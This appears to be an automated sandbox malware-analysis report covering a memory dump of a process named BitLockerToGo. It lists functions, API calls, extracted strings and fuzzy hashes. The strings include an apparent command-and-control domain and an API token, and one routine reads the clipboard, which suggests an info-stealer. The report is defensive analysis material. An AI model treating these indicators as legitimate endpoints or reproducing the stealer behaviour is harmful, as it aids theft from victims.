Instruction Fuzzy Hash: B312C0705083449FD710DF15E8907AEBBE1EF92308F18892EE8D56B392D3398915CF9A

Function 0040C4A6 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

charecteristicdxp.shop, xrefs: 0040CDB8, 0040CE28

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: charecteristicdxp.shop
API String ID: 0-778926411
Opcode ID: c48990fd3e039bdb2e97dc066a26d9568c15a4ab91b9f62af0803f4390249821
Instruction ID: fec33c3ec30d6615bfcdff99358bb3a236bd0240075eb77c8ea9b532fc4fd981
Opcode Fuzzy Hash: c48990fd3e039bdb2e97dc066a26d9568c15a4ab91b9f62af0803f4390249821
Instruction Fuzzy Hash: ED02777420C341DFD314DF18E8A0B2BBBE5EF86345F10992DE6C6876A1DB789851CB4A

Function 00434480 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00436A32,00000000,00000002,00000018,?), ref: 004344AE

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0040C1F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!m=o, xrefs: 0040C2F9
y)z+, xrefs: 0040C266
@a:c, xrefs: 0040C31A
7e(g, xrefs: 0040C30F
'i<k, xrefs: 0040C304
r%v', xrefs: 0040C26E

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !m=o$'i<k$7e(g$@a:c$r%v'$y)z+
API String ID: 0-3020094055
Opcode ID: 4a90f317286e600961811cfdeed35bda7cd0af1d37448939bbc8d2c67ac9a43f
Instruction ID: 4dcef73a9f2138ba85ff5540c5294d43e057323c9e07099f3bb71bdad247c7f6
Opcode Fuzzy Hash: 4a90f317286e600961811cfdeed35bda7cd0af1d37448939bbc8d2c67ac9a43f
Instruction Fuzzy Hash: A0812EB4108381DFE3709F55E880B9BBBB1FB86744F10892CE6DA5B665CB309854CF66

Function 0042BA80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0042BAA7

Strings

!, xrefs: 0042BAC5
*, xrefs: 0042BACC
+, xrefs: 0042BAD3

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: !$*$+
API String ID: 95929093-2103251472
Opcode ID: 5319c536372ae6dd5c1cd6ba167bb63141b5caf9e9cf1e528d74ec5e20f49670
Instruction ID: e516674b794edff5636419db513f009b6ec1e7230bb85b5986af8bd07c6906ba
Opcode Fuzzy Hash: 5319c536372ae6dd5c1cd6ba167bb63141b5caf9e9cf1e528d74ec5e20f49670
Instruction Fuzzy Hash: 0A011AB4A042988FC721DF6CD8447987BF0AB6A304F1410D8D5C8E7391D7359E95CF66

Function 00409CD0 Relevance: 4.7, APIs: 3, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d47530e2a2b4cd7c908cd9c23253941579959de7c732f509ca1e5b094c0ac94
Instruction ID: d1e83cc4ef680a1bb69185b375189912d5c877a253797f1aa09d0ee7a926d41e
Opcode Fuzzy Hash: 2d47530e2a2b4cd7c908cd9c23253941579959de7c732f509ca1e5b094c0ac94
Instruction Fuzzy Hash: B1719F70258302DBC708BE38C16863B7AE19F81318F15453FA497AB7E2D63D9C51A75B

Function 00433A90 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7605505fbbd499d4a57af64adcdb298e2e4cb4b08c073069b4607f0c2ccfe2
Instruction ID: e4866cba4bdd14e09279046bc47f9e7936b39e7ae2b9cf3a17555cff77190fc7
Opcode Fuzzy Hash: 5b7605505fbbd499d4a57af64adcdb298e2e4cb4b08c073069b4607f0c2ccfe2
Instruction Fuzzy Hash: CC71A33761C3A0EFC7144F7CB99222E7AE16B99353F495C79F082C3161D23C865A8B25

Function 00432760 Relevance: 1.6, APIs: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 00432843

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3c1d30fa27be1b432caba8e1b37e80d044657446df8c4276eae6fe082fd232a4
Instruction ID: 3bba60bd0d15ba0d67a7da581e337574677c9b8d5488212b37df33cab4fbf600
Opcode Fuzzy Hash: 3c1d30fa27be1b432caba8e1b37e80d044657446df8c4276eae6fe082fd232a4
Instruction Fuzzy Hash: E4212C3420C2409BD318EB18D5A4A2EFBF2EFCA704F549E2CD1CA033A1C7359821CB4A

Function 00432752 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00432756

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79f09bc8efabcf8541a69575b6dad9b7bd086603c8269b491304ef62dc000e3f
Instruction ID: fea310b0774e991097aeb56c7e108ad56f852cd2d250b04bdad57e11474254cb
Opcode Fuzzy Hash: 79f09bc8efabcf8541a69575b6dad9b7bd086603c8269b491304ef62dc000e3f
Instruction Fuzzy Hash: 21A022B80002002BF23023288C0AF33320CEB02208FE80880BA08800E2C8BA8820002C

Non-executed Functions

Function 0040102B Relevance: 82.2, Strings: 65, Instructions: 987COMMON

Download Yara Rule

Strings

||Ob, xrefs: 004011DE
jiwx, xrefs: 004011C8
v/,m, xrefs: 004011FF
ca|{, xrefs: 004011E9
_1PO, xrefs: 00401186
0325, xrefs: 00401333
v3|6, xrefs: 004014BF
c"<b, xrefs: 00401559
,/.!, xrefs: 00401354
Y, xrefs: 004014F6
QRST, xrefs: 0040114F
"j!?, xrefs: 0040154E
pN, xrefs: 004010B3
;xA/, xrefs: 00401564
vr~q, xrefs: 004013D8
z6x:, xrefs: 004014B4
gbFy, xrefs: 004013C2
X[Wl, xrefs: 00401375
'%h", xrefs: 00401543
suqs, xrefs: 0040103B
TRSY, xrefs: 00401430
#"%, xrefs: 0040135F
Vyfw, xrefs: 004011F4
(+-/, xrefs: 00401349
"= ?, xrefs: 0040128E
{xyv, xrefs: 00401063
p}lk, xrefs: 004011BD
LUTK, xrefs: 00401467
^]N@, xrefs: 00401451
@CBH, xrefs: 0040145C
MNO3, xrefs: 004011B2
3234, xrefs: 0040126D
YS^d, xrefs: 00401380
+45:, xrefs: 00401278
~$5, xrefs: 00401283
6E*3, xrefs: 0040156F
-J|{, xrefs: 0040110D
RAPG, xrefs: 00401472
qrst, xrefs: 004010F7
^]\_, xrefs: 00401446
u^z}, xrefs: 004013CD
D[T], xrefs: 0040107B
vutL, xrefs: 004011A7
zyO@, xrefs: 00401118
psru, xrefs: 0040104B
UUU,, xrefs: 00401170
jYh, xrefs: 00401488
XED_, xrefs: 0040143B
LOgj, xrefs: 004013AC
ZY_P, xrefs: 00401144
HKJM, xrefs: 004013A1
&;tL, xrefs: 004011D3
XTUQ, xrefs: 00401425
bk1}, xrefs: 0040149E
o`, xrefs: 004010C3
k, xrefs: 00401328
r1pP, xrefs: 004014CA
PSRU, xrefs: 0040138B
uv67, xrefs: 00401102
6543, xrefs: 004012AF
nMlS, xrefs: 0040147D
twvi, xrefs: 00401053
TWVI, xrefs: 00401396
oGBE, xrefs: 004013B7
2, xrefs: 0040157A

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: o`$ #"%$"= ?$"j!?$&;tL$'%h"$(+-/$+45:$,/.!$-J|{$0325$2$3234$6543$6E*3$;xA/$@CBH$D[T]$HKJM$LOgj$LUTK$MNO3$PSRU$QRST$RAPG$TRSY$TWVI$UUU,$Vyfw$XED_$XTUQ$X[Wl$Y$YS^d$ZY_P$^]N@$^]\_$_1PO$bk1}$c"<b$ca|{$gbFy$jYh$jiwx$k$nMlS$oGBE$psru$p}lk$qrst$r1pP$suqs$twvi$u^z}$uv67$v/,m$v3|6$vr~q$vutL$z6x:$zyO@${xyv$||Ob$~$5$pN
API String ID: 0-464871046
Opcode ID: 8a0170baf5910c25ffe01e01c56de9276efe70cb05913bf21b90bb897f02784f
Instruction ID: 1edbb666184c2963ec04dbabd6119b9e15f54aebaa382f67391d222dc31f31ac
Opcode Fuzzy Hash: 8a0170baf5910c25ffe01e01c56de9276efe70cb05913bf21b90bb897f02784f
Instruction Fuzzy Hash: 839299B650C391CFE3248F25D8A139ABBE2FBD5345F08896DD2C90B396C3389555CB86

Function 0040CA90 Relevance: 20.6, Strings: 16, Instructions: 598COMMON

Download Yara Rule

Strings

S%U', xrefs: 0040CAE7
hI2K, xrefs: 0040CB32
charecteristicdxp.shop, xrefs: 0040CDB8, 0040CE28
zMzO, xrefs: 0040CB3D
9]_, xrefs: 0040CB69
yQrS, xrefs: 0040CB48
(Y6[, xrefs: 0040CB5E
`a, xrefs: 0040D244
.AtC, xrefs: 0040CB1F
Gq\s, xrefs: 0040CBA0
Ym]o, xrefs: 0040CB95
Gu@w, xrefs: 0040CBAB
k=W?, xrefs: 0040CB17
XyR{, xrefs: 0040CBB6
pE}G, xrefs: 0040CB27
D!M#, xrefs: 0040CADF

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$`a$charecteristicdxp.shop$hI2K$k=W?$pE}G$yQrS$zMzO
API String ID: 0-1573174199
Opcode ID: 39fa2557a457a6f36d83d89ef3792a3e5ac06d3d82bacec837b890d3a4db7745
Instruction ID: c6b9044b07d3879801a01444c6147433ff962e2904c4dcdd7badf17ca8206c33
Opcode Fuzzy Hash: 39fa2557a457a6f36d83d89ef3792a3e5ac06d3d82bacec837b890d3a4db7745
Instruction Fuzzy Hash: D422427410C381EBD324DF55D890B6BBBF1EF86744F108A2DE2C95B2A0C7789855CB9A

Function 004241B0 Relevance: 20.6, APIs: 1, Strings: 10, Instructions: 1330COMMON

Download Yara Rule

Strings

WDPi, xrefs: 00424EE6
fnK{, xrefs: 00424391
onB, xrefs: 00425542
yxK$, xrefs: 004243AF
HdB, xrefs: 00424733
147m, xrefs: 004252FB
0ecj, xrefs: 0042437D
YnB, xrefs: 0042582D
Z:$:, xrefs: 00425520
i\oZ, xrefs: 00424387

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0ecj$147m$HdB$WDPi$YnB$Z:$:$fnK{$i\oZ$onB$yxK$
API String ID: 0-4186524402
Opcode ID: 4c70131d2942758327af14c7960f0865af92e9a5fbe46475f13184b99a03b400
Instruction ID: 908c01deb7159ea7585674dad2b0b96efc352281cafae311f9bd910d6a094d54
Opcode Fuzzy Hash: 4c70131d2942758327af14c7960f0865af92e9a5fbe46475f13184b99a03b400
Instruction Fuzzy Hash: EEB27870205B908BD325CF35D4A47A3BBE1AF96304F948A5EC4EB4B392C779A405CF99

Function 0041CB50 Relevance: 20.0, APIs: 1, Strings: 10, Instructions: 768COMMON

Download Yara Rule

Strings

sdtb, xrefs: 0041D918
4`[b, xrefs: 0041DAB0
;Tut, xrefs: 0041D938
'_kg, xrefs: 0041D920
dts~, xrefs: 0041D930
wlto, xrefs: 0041D940
45, xrefs: 0041D681
4`[b, xrefs: 0041D540
zh!\, xrefs: 0041D928
Sndw, xrefs: 0041D9A4, 0041D976, 0041D9AF

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '_kg$45$4`[b$4`[b$;Tut$Sndw$dts~$sdtb$wlto$zh!\
API String ID: 0-3967318514
Opcode ID: dbe71146ed9c9d1492315b0230d5869e60b256f1c04e1eb48c8c0b1902ee1bab
Instruction ID: 7add270605e0a8b1f1b828d959599d2a92b10d5c7ac839838eb91efdb517d87c
Opcode Fuzzy Hash: dbe71146ed9c9d1492315b0230d5869e60b256f1c04e1eb48c8c0b1902ee1bab
Instruction Fuzzy Hash: 4232A8B0908340DFD314EF14E890A6BBBE1FF86304F14992DE5C68B3A2D7799855CB5A

Function 0041A502 Relevance: 18.5, Strings: 14, Instructions: 1042COMMON

Download Yara Rule

Strings

Ey, xrefs: 0041A8BC
?];_, xrefs: 0041AD89
^O, xrefs: 0041A8A6
|MzO, xrefs: 0041A74B
PQ, xrefs: 0041A782
uw, xrefs: 0041ADF7
4`[b, xrefs: 0041B280
~q, xrefs: 0041A8B1
HI, xrefs: 0041AA7F
[%@', xrefs: 0041AD73
nYm[, xrefs: 0041A76C
4`[b, xrefs: 0041B8D0
xI{K, xrefs: 0041A740
, xrefs: 0041B749

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $4`[b$4`[b$?];_$Ey$HI$PQ$[%@'$^O$nYm[$xI{K$|MzO$~q$uw
API String ID: 0-814431102
Opcode ID: d90a217fd452181b2661418f9ca650c295ccdf3abd58d807f0766d1dfef6b845
Instruction ID: 9837b55ccc760de21765164deeda4337b2e0afacbc3e8a74192963e9af1083bb
Opcode Fuzzy Hash: d90a217fd452181b2661418f9ca650c295ccdf3abd58d807f0766d1dfef6b845
Instruction Fuzzy Hash: 9BA21DB4108381CBE374CF25D491B9BBBE1FF96344F608A1EE1D94B261DB349485CB96

Function 004143E2 Relevance: 14.9, Strings: 11, Instructions: 1160COMMON

Download Yara Rule

Strings

|, xrefs: 00414CD8
>>>, xrefs: 004145D3
[9Y;, xrefs: 00414906
4I-W, xrefs: 00414A8E
'Q:_, xrefs: 00414A9E
|}, xrefs: 004149B3
Rm, xrefs: 00414858
hk, xrefs: 0041467E
'U,S, xrefs: 00414A96
CA, xrefs: 004143DB
,-, xrefs: 0041491E

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 'Q:_$'U,S$,-$4I-W$>>>$Rm$[9Y;$hk$|$|}$CA
API String ID: 0-1777869092
Opcode ID: fc7d79d64fdb4455232e919f052e2b19c35073e478d40bb731d77701292a6af6
Instruction ID: 0c549f088d92c593be36f7da2e130411f1dc153c8076699132b6052f4e8b4997
Opcode Fuzzy Hash: fc7d79d64fdb4455232e919f052e2b19c35073e478d40bb731d77701292a6af6
Instruction Fuzzy Hash: 95729CB050C3808BD315DF19D49066BFBE2EFD6358F188A2DE0D54B392D3399985CB9A

Function 0042A2A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042A2B4
GetWindowLongW.USER32 ref: 0042A2D9
GetClipboardData.USER32 ref: 0042A2E9
GlobalLock.KERNEL32 ref: 0042A308
GlobalUnlock.KERNEL32 ref: 0042A3F6
CloseClipboard.USER32 ref: 0042A401

Strings

k, xrefs: 0042A36E

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: k
API String ID: 2832541153-140662621
Opcode ID: 836b3af97cdb8cb2e444e3e4549b86c56a620b033e410b6d3cd2989a6d501f0c
Instruction ID: bc475329153e19c7bb30fedcf8be3adf67c0b8523ce2d3a0a4714265ec18b910
Opcode Fuzzy Hash: 836b3af97cdb8cb2e444e3e4549b86c56a620b033e410b6d3cd2989a6d501f0c
Instruction Fuzzy Hash: E9418C7050C7918FC310EF3CA44832FBFE09B96324F444A2DE8E6462D2D279855ACB9B

Function 00425833 Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 933COMMON

Download Yara Rule

Strings

+dB, xrefs: 00426425
A^Y[, xrefs: 004262C4
UUC\, xrefs: 004262CB
MVVS, xrefs: 004262B6

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +dB$A^Y[$MVVS$UUC\
API String ID: 0-2462477172
Opcode ID: c7f3c8098511ff04eb9a669a12f030163fa448634da9b9832525d39c94d27f58
Instruction ID: f1ddcab30d69d1b0b706319535ba0df45c68fbdf516fd940372547ae5c4ffa57
Opcode Fuzzy Hash: c7f3c8098511ff04eb9a669a12f030163fa448634da9b9832525d39c94d27f58
Instruction Fuzzy Hash: D0621570204B508BD328CF35D4947A3BBE2BF56304F688A6ED4EB87792D739A445CB58

Function 0042473C Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 911COMMON

Download Yara Rule

Strings

WDPi, xrefs: 00424EE6
Rfdn, xrefs: 00424822
147m, xrefs: 004252FB
-#)$, xrefs: 004252F1

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -#)$$147m$Rfdn$WDPi
API String ID: 0-576834600
Opcode ID: 01babecc41a5517dbe82c92042efa3d537a9d1dd0fd6cf36d693fee99c8a8ce8
Instruction ID: be9f3cf6e570d2f137b4a25c2c460c77bf4cdcacddc1ebeb8b98512e7a157202
Opcode Fuzzy Hash: 01babecc41a5517dbe82c92042efa3d537a9d1dd0fd6cf36d693fee99c8a8ce8
Instruction Fuzzy Hash: 05728B70109F908AD725CF39D4947A3BBE1BF6A305F84499DD0EB8B282C77A6405CF99

Function 004199C0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 499COMMON

Download Yara Rule

Strings

K_, xrefs: 00419F96
^Y, xrefs: 00419E9D
y{, xrefs: 00419CBB
UT, xrefs: 00419F86

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: K_$UT$^Y$y{
API String ID: 0-3804715416
Opcode ID: 4724a2cefa88391eb9b26f3b1cb772b34a57150531d8b64383f0ca1f965d83fc
Instruction ID: fb8aa0e463e6183a384189f9653834cea5b61132605a77b1d4907f12281c5f34
Opcode Fuzzy Hash: 4724a2cefa88391eb9b26f3b1cb772b34a57150531d8b64383f0ca1f965d83fc
Instruction Fuzzy Hash: 7F0220B0108341ABD310DF19E991A2BBBF1EF86788F10492DE4C98B351D339D985CB9B

Function 004139D1 Relevance: 9.2, Strings: 7, Instructions: 441COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00413B80
GLq~, xrefs: 00413AB6
@FLC, xrefs: 00413A62
(BA, xrefs: 00413BFC
imaV, xrefs: 00413A7A
mV, xrefs: 00413A82
H^T[, xrefs: 00413A72

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (BA$4`[b$@FLC$GLq~$H^T[$imaV$mV
API String ID: 0-1310684253
Opcode ID: d065927a4a9b63706d7c34cf2bc190add0f741f1ffd366f4d620d16cd032b774
Instruction ID: a282ea1c0acc94e063fef4a914c30d1352cae7ad50fbddc3ef88f25430c589c2
Opcode Fuzzy Hash: d065927a4a9b63706d7c34cf2bc190add0f741f1ffd366f4d620d16cd032b774
Instruction Fuzzy Hash: 64E1FEB1508341CFC710DF28D89166BBBE2AF85305F14492EE5C997362E73ADD85CB8A

Function 00412115 Relevance: 5.8, Strings: 4, Instructions: 825COMMON

Download Yara Rule

Strings

PR, xrefs: 004124DA
4`[b, xrefs: 00412690
QS, xrefs: 00412ACA
UW, xrefs: 00412AC3

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$PR$QS$UW
API String ID: 0-2581709227
Opcode ID: 4f754344d0ba08f6497bcac268462c798e9688fe02009b291c8a46405c633d3d
Instruction ID: 4094afc94b687963602dfa8249d7d3d1159bba4d59d2c4133317f3ab4ed40512
Opcode Fuzzy Hash: 4f754344d0ba08f6497bcac268462c798e9688fe02009b291c8a46405c633d3d
Instruction Fuzzy Hash: 314245B4600B418BD325CF28C594A63B7F1FF49300F148A6ED49A8BBA1D778F895CB58

Function 0040B5F0 Relevance: 5.4, Strings: 4, Instructions: 417COMMON

Download Yara Rule

Strings

PLHJ, xrefs: 0040B602
@A, xrefs: 0040B7C7
l3aD5kQNFAFJ0us2znHMtBViGKtZ6731N4ENSaRLwLI-1724836330-0.0.1.1-/api, xrefs: 0040BAE7, 0040BB04
iSo, xrefs: 0040B708

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @A$PLHJ$l3aD5kQNFAFJ0us2znHMtBViGKtZ6731N4ENSaRLwLI-1724836330-0.0.1.1-/api$iSo
API String ID: 0-3875984982
Opcode ID: 70cb20f4a2b41ad002e1264b8466e22802b252111154f82bb59e59611636bb33
Instruction ID: 88e1c2c578818b4e84ee69584d010ad23c821e77cc45f22feedd8c35fc0c7f7e
Opcode Fuzzy Hash: 70cb20f4a2b41ad002e1264b8466e22802b252111154f82bb59e59611636bb33
Instruction Fuzzy Hash: F4E1277020C3809BD315DF19C09062BBBE1EFC6758F188A2EE5D96B391D339D855CB9A

Function 0041BEE0 Relevance: 5.4, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

a_, xrefs: 0041C01A
4`[b, xrefs: 0041C260
4`[b, xrefs: 0041C470
}{, xrefs: 0041BFCD

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$a_$}{
API String ID: 0-2842226507
Opcode ID: 6ec6e4ddb6b111e455a8cd1bdc48bdf5da0ff46dd6ace38d1517089de2ad573b
Instruction ID: 1710731aab1595251ca9e4b30b563d921c616f711a6c723b54f0434ddf652436
Opcode Fuzzy Hash: 6ec6e4ddb6b111e455a8cd1bdc48bdf5da0ff46dd6ace38d1517089de2ad573b
Instruction Fuzzy Hash: 1AE1B9B4508341DFE728DF14E8A1B6BBBE1FBC5308F14892DE58A4B351C739A855CB4A

Function 00411501 Relevance: 4.7, Strings: 3, Instructions: 921COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00411F80
4`[b, xrefs: 00411C40
4`[b, xrefs: 00411DE0

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$4`[b
API String ID: 0-1344377319
Opcode ID: 541250f1e67055381f67180a8cfd62521c65509aff0206720be8603a8f8666e2
Instruction ID: b78cd9b5fe56f3d0b10de1cf500e476c37ac7021cce66b4bdfb3dfa081baf723
Opcode Fuzzy Hash: 541250f1e67055381f67180a8cfd62521c65509aff0206720be8603a8f8666e2
Instruction Fuzzy Hash: C66277B4610B018BD329CF24C9A0B63B7F2FF49305F14892DD59687AA1D73AF855CB98

Function 00405840 Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

IEND, xrefs: 00405CF6
), xrefs: 004058DA
), xrefs: 004058E4

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 19ccc15c343ba2b9a288f4b4c95ea8747436435ed870b299d642740347a73477
Instruction ID: 8fb45e736c23740fa90fd9289c8fc205d9e5dcbf5b067285807b6105564965f5
Opcode Fuzzy Hash: 19ccc15c343ba2b9a288f4b4c95ea8747436435ed870b299d642740347a73477
Instruction Fuzzy Hash: B0F19EB1A08B019FD314DF28C88575BBBE1FB84314F18892EE594AB3C1D779E915CB86

Function 0040BB80 Relevance: 4.2, Strings: 3, Instructions: 401COMMON

Download Yara Rule

Strings

r~, xrefs: 0040BDD1
qw, xrefs: 0040BC83
y1, xrefs: 0040BDE5

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: r~$y1$qw
API String ID: 0-2739177790
Opcode ID: b4275684c37add21d27dc7cb0ba32e6aaa8f05ca6c13fdacca9cad15f25274e9
Instruction ID: a5c08b116d7bb6eaf4748887a202f8689297f039e72d138af8d8be6a7264832a
Opcode Fuzzy Hash: b4275684c37add21d27dc7cb0ba32e6aaa8f05ca6c13fdacca9cad15f25274e9
Instruction Fuzzy Hash: EC021FB4200B41CFE3248F25D895B97BBF5FB49314F108A2DD6AA8BA94DB74B444CF94

Function 0041C720 Relevance: 4.1, Strings: 3, Instructions: 383COMMON

Download Yara Rule

Strings

%6):, xrefs: 0041CAA0
,Q, xrefs: 0041CAB0
+g.+, xrefs: 0041CAA8

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

